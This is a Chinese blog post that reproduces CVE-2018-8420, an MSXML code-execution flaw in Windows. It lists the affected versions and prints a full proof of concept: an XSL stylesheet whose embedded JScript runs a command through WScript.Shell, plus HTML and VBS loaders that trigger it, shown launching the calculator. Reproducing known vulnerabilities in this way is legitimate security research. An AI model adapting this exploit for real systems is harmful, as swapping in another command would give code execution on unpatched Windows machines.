2. 程式人生 > >CVE-2018-8420 漏洞復現

CVE-2018-8420 漏洞復現

阿新 發佈:2018-12-21

影響的 Windows 版本:

Microsoft Windows 10 Version 1607 for 32-bit Systems
Microsoft Windows 10 Version 1607 for x64-based Systems
Microsoft Windows 10 Version 1803 for 32-bit Systems
Microsoft Windows 10 Version 1803 for x64-based Systems
Microsoft Windows 10 for 32-bit Systems
Microsoft Windows 10 for x64-based Systems
Microsoft Windows 10 version 1703 for 32-bit Systems
Microsoft Windows 10 version 1703 for x64-based Systems
Microsoft Windows 10 version 1709 for 32-bit Systems
Microsoft Windows 10 version 1709 for x64-based Systems
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for 64-bit Systems
Microsoft Windows RT 8.1
Microsoft Windows Server 1709
Microsoft Windows Server 1803
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2016

漏洞復現:

本地測試版本:Microsoft Windows Server 2008 R2 Datacenter

Poc 地址:https://github.com/Sch01ar/CVE-2018-8420

xml,呼叫計算器

 1 <?xml version='1.0'?>
 2 <stylesheet
 3 xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
 4 xmlns:user="placeholder"
 5 version="1.0">
 6
 
 <output method="text"/>
 7  <ms:script implements-prefix="user" language="JScript">
 8  <![CDATA[
 9  var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
10  ]]> </ms:script>
11 </stylesheet>

html

<script type="text/vbscript">
Sub POC()
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load "xml.xml"
XML.transformNode xsl
End Sub
POC()
</script>

vbs

Sub Dummy()
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load "xml.xml"
XML.transformNode xsl
End Sub
Dummy()

開啟 xml.html

 

點選,是

點選,是

成功彈出了計算器

直接執行 xml.vbs

也成功彈出了計算器

相關推薦

CVE-2018-8420 漏洞復現

影響的 Windows 版本: Microsoft Windows 10 Version 1607 for 32-bit SystemsMicrosoft Windows 10 Version 1607 for x64-based SystemsMicrosoft Windows 10 Version 18

CVE-2018-15982漏洞復現

  作者:歐根   漏洞資訊:CVE-2018-15982 Adobe已釋出適用於Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新。這些更新解決一個  關鍵的  Adobe Flash Player的漏

CVE-2018-1111漏洞復現-環境搭建與dhcp命令注入

0×01 前言 2018年5月,在Red Hat Enterprise Linux多個版本的DHCP客戶端軟體包所包含的NetworkManager整合指令碼中發現了命令注入漏洞(CVE-2018-1111),該漏洞目前已經進行了修補。攻擊者可以通過本地網路上的惡意DHCP伺服器或使用惡意的虛假DHCP響應

DHCP命令執行CVE-2018-1111漏洞復現

DHCP命令執行_CVE-2018-1111漏洞復現 一、漏洞描述 在Red Hat Enterprise Linux多個版本的DHCP客戶端軟體包所包含的NetworkManager整合指令碼中發現了命令注入漏洞,攻擊者可以通過本地網路上的惡意DHCP伺服器或者使用惡意的虛假DHCP響應來利用此漏洞進行

Vulhub - Ruby On Rails 路徑穿越漏洞CVE-2018-3760)復現

Ruby On Rails 路徑穿越漏洞(CVE-2018-3760) Ruby On Rails在開發環境下使用Sprockets作為靜態檔案伺服器,Ruby On Rails是著名Ruby Web開發框架,Sprockets是編譯及分發靜態資原始檔的Ruby庫。 Sprockets

CVE-2018-8174漏洞兩種姿勢的復現

CVE-2018-8174漏洞兩種姿勢的復現 CVE-2018-8174漏洞兩種姿勢的復現 漏洞介紹: 該漏洞影響最新版本的IE瀏覽器及使用了IE核心的應用程式。使用者在瀏覽網頁或開啟Office文件時都可能中招,最終被黑客植入後門木馬完全控制電腦。微軟在4月20日早上確認此漏洞,並於5

WebLogic任意檔案上傳漏洞(CVE-2018-2894)利用復現

環境搭建 參照: https://blog.csdn.net/qq_29647709/article/details/84892582 登入系統 環境啟動後,訪問http://192.1658.1.15:7001/console,即可看到後臺登入頁面。 登入後臺頁面,點選base_

Ruby On Rails 路徑穿越漏洞CVE-2018-3760)復現

Ruby On Rails 路徑穿越漏洞(CVE-2018-3760) Ruby On Rails在開發環境下使用Sprockets作為靜態檔案伺服器,Ruby On Rails是著名Ruby Web開發框架,Sprockets是編譯及分發靜態資原始檔的Ruby庫。 Sp

【代碼審計】Spring Integration Zip不安全解壓(CVE-2018-1261)漏洞分析

圖片 ssa clas port als put gets 9.png after 1.漏洞相關信息 漏洞名稱:Spring Integration Zip不安全解壓 漏洞編號:CVE-2018-1261 漏洞描述:在spring-integration-zip.v1.0.

CVE-2018-8120 漏洞分析

CVE-2018-8120詳細分析漏洞描述 Microsoft Windows 7 SP1、Windows Server 2008 SP2和Windows Server 2008 R2 SP1都是美國微軟(Microsoft)公司的產品。Microsoft Windows 7 SP1是一套供個人電腦使用的操

CVE-2018-4990 漏洞詳情分析

cve-2018-4990測試版本:AcroRdrDC1700920044_en_US 漏洞模塊: Escript.api 漏洞函數 修復函數 問題分析 拷貝對象的時候把DWORD類型的對象地址作為BYTE類型進行了拷貝,堆對象拷貝溢出漏洞。對象偏移在0x50的地方,也就是錯誤的位置。 Ja

Debian GNU/Linux 9 “Stretch”獲取新核心補丁,修復CVE-2018-15471和CVE-2018-18021漏洞

Debian專案釋出了一個新的Linux安全建議,以告知使用者Debian GNU/Linux 9 “Stretch”作業系統系列有關修復兩個漏洞的新核心安全補丁。 在Debian GNU/Linux 9 “Stretch”的最新主要核心安全更新發布一週後,新的Linux核心安全補丁就是為了解決Google

cve-2018-0802漏洞分析報告

軟體名稱:公式編輯器 軟體版本:2016以下 漏洞模組:EQNEDT32.EXE 模組版本:6.1.95.45 編譯日期:2000-11-9 作業系統:Windows XP/2003/7/8.1/10 漏洞編號:cve-2017-0802 危害等級:高危 漏洞型別:緩衝區溢位 威脅型別:遠端

CVE-2018-18888漏洞分析

CVE-2018-18888漏洞分析 本漏洞發現於PHP開源框架laravelCMS 其中 \app\Http\Controllers\Backend目錄下的ProfileController.php檔案中關於檔案上傳的過濾與限制部分原始碼如下 if ((($_FILES[

WebLogic反序列化漏洞CVE-2018-2628漏洞檢測與利用

Oracle官方釋出了4月份的關鍵補丁更新CPU(Critical Patch Update),其中包含Weblogic反序列化漏洞可導致遠端程式碼執行漏洞,漏洞威脅等級為高危,對應的CVE編號為CVE-2018-26 影響版本 Oracle WebLogic Se

openshift/origin工作記錄(11)——Openshift3.6向Openshift3.11升級以及CVE-2018-1002105漏洞修復

由於kubernetes的CVE-2018-1002105重大漏洞,需要對Openshift叢集進行版本升級。 當前執行的Openshift叢集版本為v3.6,目標為升級到版本v3.11。 這裡只記錄升級過程中碰到的坑,不記錄升級細節。 不能跨版本升級,升級路線為:

CVE-2018-4878的復現

前言: CVE-2018-4878利用flash的漏洞來進行攻擊,如果受害者的flash版本在28.0.0.137及其之前,那麼攻擊者可以通過誘使受害者點選連結訪問特定網頁來控制受害者的電腦。 1 漏洞影響範圍 Flash Player28.0.0.137及以前的所有版

CVE-2017-11882漏洞復現

作者:zero   漏洞資訊:CVE-2017-11882     2017年11月14日,微軟釋出了11月份的安全補丁更新,其中比較引人關注的莫過於悄然修復了潛伏17年之久的Office遠端程式碼執行漏洞(CVE-2017-11882)。該漏洞為Office內&nbs

CVE-2018-18888漏洞挖掘分析

CVE-2018-18888漏洞分析 其中 \app\Http\Controllers\Backend目錄下的ProfileController.php檔案中關於檔案上傳的過濾與限制部分原始碼如下 if ((($_FILES["avatar"]["type"] ==

利用CVE-2018-0950漏洞自動竊取Windows密碼

0×00 前言記得還在2016年的時候,我的一個同事那時還在使用CERT BFF(自動化模糊測試工具),他向我詢問到如何將微軟辦公軟體中看起來可利用的漏洞轉化成可以執行的病毒程式並進行概念論證。考慮到現代微軟平臺中所使用的隨機空間地址分配策略(ASLR),這項工作的實施並不像